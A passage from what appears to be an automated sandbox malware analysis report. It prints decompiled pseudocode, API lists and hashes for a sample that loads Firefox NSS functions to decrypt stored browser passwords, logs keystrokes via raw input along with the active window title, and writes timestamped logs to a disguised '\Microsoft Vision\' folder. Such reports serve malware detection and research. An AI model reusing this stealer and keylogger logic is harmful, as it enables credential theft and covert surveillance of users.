                                      							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
                                      							_t135 = LoadLibraryW(_v32);
                                      							 *(_t216 + 0xb8) = _t135;
                                      							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
                                      								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
                                      								if(_t194 != 0) {
                                      									_t230 = _t135;
                                      									if(_t135 != 0) {
                                      										_push(_t194);
                                      										 *((intOrPtr*)(_t216 + 0x68)) = E0043E907(_t194, "NSS_Init", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x80)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x7c)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x70)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x74)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x78)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x6c)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x84)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x88)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
                                      										SetCurrentDirectoryW( &_v560);
                                      										_t158 = 1;
                                      									}
                                      								}
                                      							}
                                      							E00435A2D(_v24);
                                      							E00435A2D(_v28);
                                      							E00435A2D(_v32);
                                      							E00435A2D(_v36);
                                      							E00435A2D(_v16);
                                      							E00435A2D(_v20);
                                      							E00435A2D(_v40);
                                      							E00435A2D(_a4);
                                      							return _t158;
                                      						}
                                      						E00433264( &_v20,  &_v8);
                                      						E00435A2D(_v8);
                                      						goto L9;
                                      					}
                                      				}
                                      				E00433264( &_v16,  &_v8);
                                      				E00435A2D(_v8);
                                      				goto L5;
                                      			}

                                      0x0043a324
                                      0x0043a33c
                                      0x0043a33e
                                      0x0043a342
                                      0x0043a352
                                      0x0043a35b
                                      0x0043a369
                                      0x0043a375
                                      0x0043a382
                                      0x0043a38e
                                      0x0043a39b
                                      0x0043a3a7
                                      0x0043a3b4
                                      0x0043a3c0
                                      0x0043a3cd
                                      0x0043a3d9
                                      0x0043a3e6
                                      0x0043a3f2
                                      0x0043a3ff
                                      0x0043a40b
                                      0x0043a418
                                      0x0043a41f
                                      0x0043a420
                                      0x0043a423
                                      0x0043a42a
                                      0x0043a441
                                      0x0043a451
                                      0x00000000
                                      0x00000000
                                      0x0043a456
                                      0x0043a45a
                                      0x0043a45f
                                      0x0043a466
                                      0x0043a469
                                      0x00000000
                                      0x0043a46b
                                      0x0043a481
                                      0x0043a481
                                      0x0043a488
                                      0x0043a49d
                                      0x0043a4ad
                                      0x00000000
                                      0x00000000
                                      0x0043a4b2
                                      0x0043a4b5
                                      0x0043a4ba
                                      0x0043a4c3
                                      0x00000000
                                      0x00000000
                                      0x0043a4db
                                      0x0043a4e9
                                      0x0043a4f4
                                      0x0043a4ff
                                      0x0043a50a
                                      0x0043a510
                                      0x0043a512
                                      0x0043a51e
                                      0x0043a530
                                      0x0043a538
                                      0x0043a53e
                                      0x0043a540
                                      0x0043a546
                                      0x0043a55c
                                      0x0043a56f
                                      0x0043a585
                                      0x0043a598
                                      0x0043a5ab
                                      0x0043a5be
                                      0x0043a5d1
                                      0x0043a5e4
                                      0x0043a5ef
                                      0x0043a5fd
                                      0x0043a605
                                      0x0043a605
                                      0x0043a540
                                      0x0043a538
                                      0x0043a609
                                      0x0043a611
                                      0x0043a619
                                      0x0043a621
                                      0x0043a629
                                      0x0043a631
                                      0x0043a639
                                      0x0043a641
                                      0x0043a64c
                                      0x0043a64c
                                      0x0043a4ce
                                      0x0043a4d6
                                      0x00000000
                                      0x0043a4d6
                                      0x0043a469
                                      0x0043a474
                                      0x0043a47c
                                      0x00000000

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0043A352
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A35B
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043309F: wsprintfW.USER32 ref: 004330BA
                                      • PathFileExistsW.SHLWAPI(00439406), ref: 0043A449
                                      • PathFileExistsW.SHLWAPI(00439406), ref: 0043A4A5
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A4E4
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A4EF
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A4FA
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A505
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A510
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A5FD
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                      • API String ID: 410702425-850564384
                                      • Opcode ID: f13c0fbf52b8ceaf8164bc2f03f1eebf023bea842679a3d285595bee91c5fe4e
                                      • Instruction ID: 9e88c3e77e91cfe5c3441bde6d7bc776bbfec12eaad2c05da36f296a98c7f872
                                      • Opcode Fuzzy Hash: f13c0fbf52b8ceaf8164bc2f03f1eebf023bea842679a3d285595bee91c5fe4e
                                      • Instruction Fuzzy Hash: 56916E70E00609ABDB04FFA1D986AEEB775BF18309F50512FF11663192DB786A14CB58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 85%
                                      			E00437CB3(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				char _v524;
                                      				short _v564;
                                      				intOrPtr _v568;
                                      				short _v570;
                                      				short _v572;
                                      				long _v596;
                                      				char _v600;
                                      				int _v604;
                                      				char _v612;
                                      				intOrPtr _v616;
                                      				struct _OVERLAPPED* _v620;
                                      				char _v624;
                                      				char _v628;
                                      				void* _v632;
                                      				char _v636;
                                      				intOrPtr _v640;
                                      				struct _OVERLAPPED* _v644;
                                      				char _v648;
                                      				void* _t76;
                                      				short _t77;
                                      				void* _t82;
                                      				char* _t84;
                                      				struct _OVERLAPPED** _t86;
                                      				long _t88;
                                      				intOrPtr _t93;
                                      				intOrPtr* _t96;
                                      				long _t100;
                                      				intOrPtr _t101;
                                      				WCHAR* _t102;
                                      				intOrPtr _t104;
                                      				void* _t105;
                                      				long _t109;
                                      				void* _t110;
                                      				intOrPtr _t111;
                                      				intOrPtr _t113;
                                      				long _t116;
                                      				intOrPtr _t117;
                                      				intOrPtr _t119;
                                      				long _t121;
                                      				intOrPtr _t122;
                                      				intOrPtr _t124;
                                      				void* _t126;
                                      				intOrPtr _t128;
                                      				intOrPtr _t130;
                                      				long _t132;
                                      				intOrPtr _t133;
                                      				intOrPtr _t135;
                                      				DWORD* _t136;
                                      				long _t137;
                                      				intOrPtr _t138;
                                      				long _t142;
                                      				void* _t152;
                                      				long _t164;
                                      				intOrPtr _t178;
                                      				intOrPtr _t189;
                                      				void* _t195;
                                      				struct _OVERLAPPED* _t198;
                                      				struct _OVERLAPPED* _t201;
                                      				void* _t204;
                                      				void* _t206;
                                      				void* _t208;
                                      				signed int _t209;
                                      				void* _t212;
                                      				void* _t213;
                                      
                                      				_t198 = 0;
                                      				_v600 = 0;
                                      				E00431052( &_v524, 0, 0x208);
                                      				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
                                      				_t201 = 0;
                                      				_v604 = 0;
                                      				_t76 = _a8 - 1;
                                      				if(_t76 == 0) {
                                      					_t77 = 6;
                                      					_v570 = _t77;
                                      					__eflags = 1;
                                      					_v564 = _a4;
                                      					_v568 = 0x130;
                                      					_v572 = 1;
                                      					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
                                      				} else {
                                      					_t82 = _t76 - 0xf;
                                      					if(_t82 == 0) {
                                      						PostQuitMessage(0);
                                      					} else {
                                      						if(_t82 == 0xef) {
                                      							_t84 =  &_v600;
                                      							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
                                      							__eflags = _t84 - 0xffffffff;
                                      							if(_t84 != 0xffffffff) {
                                      								_t164 = E00435ADB(_v620);
                                      								_v596 = _t164;
                                      								__eflags = _t164;
                                      								if(_t164 != 0) {
                                      									_t86 =  &_v620;
                                      									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
                                      									__eflags = _t86 - _v640;
                                      									if(_t86 == _v640) {
                                      										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
                                      										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
                                      											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
                                      											__eflags = _t88;
                                      											if(_t88 <= 0) {
                                      												E0043312C( &_v644, _t195, L"Unknow");
                                      											} else {
                                      												E00433264( &_v648, E00433412( &_v636,  &_v564));
                                      												E00435A2D(_v644);
                                      											}
                                      											E00438133( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
                                      											E00433264( &_v632,  &_v644);
                                      											_t93 =  *0x446690; // 0x0
                                      											E00433297( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
                                      											_t96 =  *0x446690; // 0x0
                                      											__eflags =  *_t96 - _t198;
                                      											if( *_t96 != _t198) {
                                      												_t213 = _t212 - 0x10;
                                      												__eflags = _t96 + 0xa18;
                                      												E00431301(_t213, _t96 + 0xa18, _t96 + 0xa18);
                                      												_t208 = _t213 - 0x10;
                                      												E0043345A(_t208,  &_v636);
                                      												 *((intOrPtr*)(_t208 + 4)) = _v636;
                                      												 *((short*)(_t208 + 8)) = _v632;
                                      												E0043345A(_t208 + 0xc,  &_v628);
                                      												_t152 = E0043460B( &_v612, __eflags);
                                      												_t189 =  *0x446690; // 0x0
                                      												E00434B53( *((intOrPtr*)(_t189 + 0xa50)), _t152);
                                      												E004345E1( &_v648);
                                      												_t96 =  *0x446690; // 0x0
                                      											}
                                      											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
                                      											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
                                      												_t100 = lstrlenW(_t96 + 0x210);
                                      												__eflags = _t100;
                                      												_t101 =  *0x446690; // 0x0
                                      												if(_t100 == 0) {
                                      													L17:
                                      													_t102 = _t101 + 0x210;
                                      													__eflags = _t102;
                                      													lstrcpyW(_t102, _v632);
                                      													_t104 =  *0x446690; // 0x0
                                      													 *(_t104 + 0xa10) = _t198;
                                      												} else {
                                      													_t142 = E00433075( &_v648, E00433412( &_v636, _t101 + 0x210));
                                      													E00435A2D(_v644);
                                      													_t101 =  *0x446690; // 0x0
                                      													_v644 = _t198;
                                      													__eflags = _t142;
                                      													if(_t142 == 0) {
                                      														goto L17;
                                      													} else {
                                      														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
                                      													}
                                      												}
                                      												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
                                      												_t178 =  *0x446690; // 0x0
                                      												 *(_t178 + 4) = _t105;
                                      												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
                                      												if(__eflags == 0) {
                                      													_t49 = _t178 + 8; // 0x8
                                      													_t204 = L"\r\n";
                                      													_t116 = lstrlenW(_t204);
                                      													_t117 =  *0x446690; // 0x0
                                      													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
                                      													_t119 =  *0x446690; // 0x0
                                      													_t121 = lstrlenW(_t204);
                                      													_t122 =  *0x446690; // 0x0
                                      													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
                                      													_t124 =  *0x446690; // 0x0
                                      													_t126 = E0043308E( &_v632);
                                      													_t128 =  *0x446690; // 0x0
                                      													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
                                      													_t130 =  *0x446690; // 0x0
                                      													_t206 = L"\r\n";
                                      													_t132 = lstrlenW(_t206);
                                      													_t133 =  *0x446690; // 0x0
                                      													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
                                      													_t135 =  *0x446690; // 0x0
                                      													_t136 = _t135 + 8;
                                      													__eflags = _t136;
                                      													_t137 = lstrlenW(_t206);
                                      													_t138 =  *0x446690; // 0x0
                                      													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
                                      													_t178 =  *0x446690; // 0x0
                                      												}
                                      												_t58 = _t178 + 8; // 0x8
                                      												_t109 = lstrlenW(E0043804D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
                                      												__eflags = _t109;
                                      												_t110 = E0043804D( *((intOrPtr*)(_v616 + 0x16)), _t109);
                                      												_t111 =  *0x446690; // 0x0
                                      												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
                                      												_t113 =  *0x446690; // 0x0
                                      												CloseHandle( *(_t113 + 4));
                                      											}
                                      											E00435A2D(_v620);
                                      											_v620 = _t198;
                                      											E00435A2D(_v632);
                                      											_t201 = _v644;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
                                      						}
                                      					}
                                      				}
                                      				E00435A2D(_t201);
                                      				return _t198;
                                      			}

                                      0x00437cc2
                                      0x00437ccf
                                      0x00437cd3
                                      0x00437cdb
                                      0x00437cde
                                      0x00437ce0
                                      0x00437ce4
                                      0x00437ce7
                                      0x00438010
                                      0x00438013
                                      0x0043801b
                                      0x0043801e
                                      0x00438028
                                      0x00438030
                                      0x00438035
                                      0x00437ced
                                      0x00437ced
                                      0x00437cf0
                                      0x00438006
                                      0x00437cf6
                                      0x00437cfb
                                      0x00437d18
                                      0x00437d26
                                      0x00437d2c
                                      0x00437d2f
                                      0x00437d3e
                                      0x00437d40
                                      0x00437d44
                                      0x00437d46
                                      0x00437d4e
                                      0x00437d5c
                                      0x00437d62
                                      0x00437d66
                                      0x00437d6c
                                      0x00437d73
                                      0x00437d8a
                                      0x00437d90
                                      0x00437d92
                                      0x00437dc0
                                      0x00437d94
                                      0x00437da7
                                      0x00437db0
                                      0x00437db0
                                      0x00437dcc
                                      0x00437dda
                                      0x00437ddf
                                      0x00437dec
                                      0x00437df1
                                      0x00437df6
                                      0x00437df8
                                      0x00437dfa
                                      0x00437dfd
                                      0x00437e05
                                      0x00437e11
                                      0x00437e16
                                      0x00437e22
                                      0x00437e2a
                                      0x00437e33
                                      0x00437e3c
                                      0x00437e41
                                      0x00437e4e
                                      0x00437e57
                                      0x00437e5c
                                      0x00437e5c
                                      0x00437e61
                                      0x00437e67
                                      0x00437e73
                                      0x00437e7c
                                      0x00437e7e
                                      0x00437e83
                                      0x00437ebe
                                      0x00437ec2
                                      0x00437ec2
                                      0x00437ec8
                                      0x00437ece
                                      0x00437ed3
                                      0x00437e85
                                      0x00437e99
                                      0x00437ea4
                                      0x00437ea9
                                      0x00437eae
                                      0x00437eb2
                                      0x00437eb4
                                      0x00000000
                                      0x00437eb6
                                      0x00437eb6
                                      0x00437eb6
                                      0x00437eb4
                                      0x00437ee8
                                      0x00437eee
                                      0x00437efa
                                      0x00437efd
                                      0x00437f03
                                      0x00437f0a
                                      0x00437f0d
                                      0x00437f14
                                      0x00437f1b
                                      0x00437f24
                                      0x00437f26
                                      0x00437f31
                                      0x00437f38
                                      0x00437f41
                                      0x00437f43
                                      0x00437f55
                                      0x00437f5d
                                      0x00437f66
                                      0x00437f68
                                      0x00437f6d
                                      0x00437f78
                                      0x00437f7f
                                      0x00437f88
                                      0x00437f8a
                                      0x00437f90
                                      0x00437f90
                                      0x00437f95
                                      0x00437f9c
                                      0x00437fa5
                                      0x00437fa7
                                      0x00437fa7
                                      0x00437fb1
                                      0x00437fc8
                                      0x00437fc8
                                      0x00437fcb
                                      0x00437fd1
                                      0x00437fd9
                                      0x00437fdb
                                      0x00437fe3
                                      0x00437fe3
                                      0x00437fed
                                      0x00437ff6
                                      0x00437ffa
                                      0x00437fff
                                      0x00437fff
                                      0x00437d73
                                      0x00437d66
                                      0x00437d46
                                      0x00437cfd
                                      0x00437d0f
                                      0x00437d0f
                                      0x00437cfb
                                      0x00437cf0
                                      0x0043803d
                                      0x0043804a

                                      APIs
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00437D09
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00437D26
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00437D5C
                                      • GetForegroundWindow.USER32 ref: 00437D79
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00437D8A
                                      • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00437E73
                                      • PostQuitMessage.USER32(00000000), ref: 00438006
                                      • RegisterRawInputDevices.USER32 ref: 00438035
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                      • String ID: Unknow
                                      • API String ID: 3853268301-1240069140
                                      • Opcode ID: fbe1fd052804266a5262294e517e48521792385bc430dc1a9c0f53960fa9ac82
                                      • Instruction ID: 109edb174f85ec2afc275b71d674f6efe1faf02fcd3e1164fe3f41ba2888cf3c
                                      • Opcode Fuzzy Hash: fbe1fd052804266a5262294e517e48521792385bc430dc1a9c0f53960fa9ac82
                                      • Instruction Fuzzy Hash: 61A1AE75104200AFC710EF65DC85DABBBB8FF8A304F06542EF95993261DB74E909CB6A
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 85%
                                      			E0043822F(void* __eflags, void* _a4) {
                                      				short _v544;
                                      				char _v696;
                                      				short _v704;
                                      				intOrPtr _v720;
                                      				struct _WNDCLASSW _v760;
                                      				void* _v784;
                                      				struct tagMSG _v788;
                                      				struct _SYSTEMTIME _v804;
                                      				void* _v808;
                                      				struct HINSTANCE__* _v812;
                                      				long _v820;
                                      				intOrPtr _t54;
                                      				intOrPtr _t57;
                                      				intOrPtr _t60;
                                      				intOrPtr _t62;
                                      				intOrPtr _t65;
                                      				intOrPtr _t68;
                                      				intOrPtr _t73;
                                      				struct HWND__* _t77;
                                      				int _t81;
                                      				intOrPtr _t102;
                                      				void* _t103;
                                      				intOrPtr _t107;
                                      				void* _t115;
                                      				void* _t121;
                                      				struct HINSTANCE__* _t122;
                                      				struct HWND__* _t123;
                                      				intOrPtr _t125;
                                      				signed int _t126;
                                      				signed int _t132;
                                      				intOrPtr _t135;
                                      				intOrPtr _t138;
                                      				void* _t146;
                                      				void* _t147;
                                      				long _t151;
                                      				void* _t156;
                                      				void* _t157;
                                      				signed int _t159;
                                      				signed int _t160;
                                      				void* _t162;
                                      				signed int _t163;
                                      				void* _t168;
                                      
                                      				_t122 = GetModuleHandleA(0);
                                      				_v804.wSecond = _t122;
                                      				_v788.hwnd = _v788.hwnd & 0;
                                      				_t126 = 0xa;
                                      				memset( &(_v760.hIcon), 0, _t126 << 2);
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_t54 =  *0x446690; // 0x0
                                      				_t151 = 0;
                                      				E00431052(_t54 + 0x210, 0, 0x800);
                                      				_t57 =  *0x446690; // 0x0
                                      				E00431052(_t57 + 0x10, 0, 0x208);
                                      				_t60 =  *0x446690; // 0x0
                                      				_t168 = (_t163 & 0xfffffff8) - 0x314 + 0x24;
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t60 + 0x10, _t147, _t157, _t121);
                                      				_t62 =  *0x446690; // 0x0
                                      				lstrcatW(_t62 + 0x10, L"\\Microsoft Vision\\");
                                      				_t65 =  *0x446690; // 0x0
                                      				CreateDirectoryW(_t65 + 0x10, 0);
                                      				_t68 =  *0x446690; // 0x0
                                      				_t171 =  *((intOrPtr*)(_t68 + 0xa14));
                                      				if( *((intOrPtr*)(_t68 + 0xa14)) != 0) {
                                      					E00431052( &_v544, 0, 0x208);
                                      					_t107 =  *0x446690; // 0x0
                                      					_t168 = _t168 + 0xc;
                                      					lstrcpyW( &_v544, _t107 + 0x10);
                                      					lstrcatW( &_v544, "*");
                                      					E00433412(_t168,  &_v544);
                                      					_t115 = E0043DEC5( &(_v760.lpszClassName), _t171, 0);
                                      					_t125 =  *0x446690; // 0x0
                                      					_t156 = _t115;
                                      					_t13 = _t125 + 0xa18; // 0xa18
                                      					E00431815(_t13, _t171);
                                      					_t162 = 0;
                                      					if( *((intOrPtr*)(_t156 + 8)) > 0) {
                                      						do {
                                      							_t168 = _t168 - 0x18;
                                      							E00431862(_t156, _t168, _t162);
                                      							_t15 = _t125 + 0xa18; // 0xa18
                                      							E00431716(_t15);
                                      							_t162 = _t162 + 1;
                                      						} while (_t162 <  *((intOrPtr*)(_t156 + 8)));
                                      					}
                                      					_t143 = _v720;
                                      					if(_v720 != 0) {
                                      						E00431A75(_t143, _t143);
                                      					}
                                      					_t122 = _v812;
                                      					_t151 = 0;
                                      				}
                                      				_t146 = 4;
                                      				_t159 = E004332D4( &_v812, _t146, 0);
                                      				E00433162(E00433297( &_v808, _t146, 0, L"ExplorerIdentifier"), 0, _t159);
                                      				E00435A2D(_v820);
                                      				_t73 =  *0x446690; // 0x0
                                      				_v820 = _t151;
                                      				if( *((intOrPtr*)(_t73 + 0xa14)) != _t151) {
                                      					GetLocalTime( &_v804);
                                      					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
                                      					_t135 =  *0x446690; // 0x0
                                      					_t168 = _t168 + 0x20;
                                      					_t33 = _t135 + 0x10; // 0x10
                                      					E00433297(E00433297(_t135 + 0xc, _t146, _t135 + 0xc, _t33), _t146, _t135 + 0xc,  &_v696);
                                      					_t102 =  *0x446690; // 0x0
                                      					_t103 = CreateFileW( *(_t102 + 0xc), 0x10000000, 1, _t151, 2, 0x80, _t151);
                                      					_t138 =  *0x446690; // 0x0
                                      					 *(_t138 + 4) = _t103;
                                      					CloseHandle(_t103);
                                      				}
                                      				_v760.lpszClassName = _v808;
                                      				_v760.lpfnWndProc = E00437CB3;
                                      				_v760.hInstance = _t122;
                                      				RegisterClassW( &_v760);
                                      				_t77 = CreateWindowExW(_t151, _v760.lpszClassName, _t151, _t151, _t151, _t151, _t151, _t151, 0xfffffffd, _t151, _t122, _a4);
                                      				_t132 = 7;
                                      				_t123 = _t77;
                                      				memset( &_v788, 0, _t132 << 2);
                                      				_t81 = GetMessageA( &_v788, _t123, 0, 0);
                                      				if(_t81 == 0) {
                                      					L12:
                                      					_t160 = _v788.wParam;
                                      				} else {
                                      					_t160 = _t159 | 0xffffffff;
                                      					while(_t81 != _t160) {
                                      						TranslateMessage( &_v788);
                                      						DispatchMessageA( &_v788);
                                      						_t81 = GetMessageA( &_v788, _t123, 0, 0);
                                      						if(_t81 != 0) {
                                      							continue;
                                      						} else {
                                      							goto L12;
                                      						}
                                      						goto L13;
                                      					}
                                      				}
                                      				L13:
                                      				E00435A2D(_v808);
                                      				return _t160;
                                      			}

                                      0x00438246
                                      0x0043824e
                                      0x00438252
                                      0x00438258
                                      0x00438259
                                      0x0043825f
                                      0x00438265
                                      0x00438266
                                      0x00438267
                                      0x00438268
                                      0x0043826d
                                      0x00438276
                                      0x0043827b
                                      0x0043828d
                                      0x00438292
                                      0x00438297
                                      0x004382a3
                                      0x004382a9
                                      0x004382bd
                                      0x004382bf
                                      0x004382c9
                                      0x004382cf
                                      0x004382d4
                                      0x004382da
                                      0x004382ee
                                      0x004382f3
                                      0x004382f8
                                      0x00438307
                                      0x0043831a
                                      0x00438327
                                      0x00438330
                                      0x00438335
                                      0x0043833b
                                      0x0043833e
                                      0x00438344
                                      0x00438349
                                      0x0043834e
                                      0x00438350
                                      0x00438350
                                      0x00438359
                                      0x0043835e
                                      0x00438364
                                      0x00438369
                                      0x0043836a
                                      0x00438350
                                      0x0043836f
                                      0x00438375
                                      0x00438378
                                      0x00438378
                                      0x0043837d
                                      0x00438381
                                      0x00438381
                                      0x00438385
                                      0x00438398
                                      0x004383a2
                                      0x004383ab
                                      Instruction addresses (one per decompiled statement):
                                      0x004383b0 0x004383b5 0x004383bf 0x004383ca 0x00438401 0x00438407 0x00438414 0x00438418
                                      0x00438426 0x0043842b 0x00438443 0x00438449 0x00438450 0x00438453 0x00438453 0x0043845d
                                      0x00438466 0x0043846e 0x00438472 0x0043848d 0x00438495 0x00438496 0x004384a0 0x004384ae
                                      0x004384b2 0x004384e1 0x004384e1 0x004384b4 0x004384b4 0x004384b7 0x004384c0 0x004384cb
                                      0x004384db 0x004384df 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x004384df
                                      0x004384b7 0x004384e5 0x004384e9 0x004384f6

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00438240
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 004382A3
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 004382BD
                                      • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 004382C9
                                      • lstrcpyW.KERNEL32(?,-00000010), ref: 00438307
                                      • lstrcatW.KERNEL32(?,00442928), ref: 0043831A
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043DEC5: FindFirstFileW.KERNEL32(?,?), ref: 0043DEF2
                                      • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 004383CA
                                      • wsprintfW.USER32 ref: 00438401
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00438443
                                      • CloseHandle.KERNEL32(00000000), ref: 00438453
                                      • RegisterClassW.USER32 ref: 00438472
                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,?), ref: 0043848D
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004384AE
                                      • TranslateMessage.USER32(?), ref: 004384C0
                                      • DispatchMessageA.USER32(?), ref: 004384CB
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004384DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                      • API String ID: 2678186124-2372768292
                                      • Opcode ID: d8a433de6b6426e13d78070eda398d663bec40e3adb73af1f71e2b8eae7b89cf
                                      • Instruction ID: 4553b19229ac46e0a2047d37921a0cd3f040b066402a8f9f86d7a6066209b53d
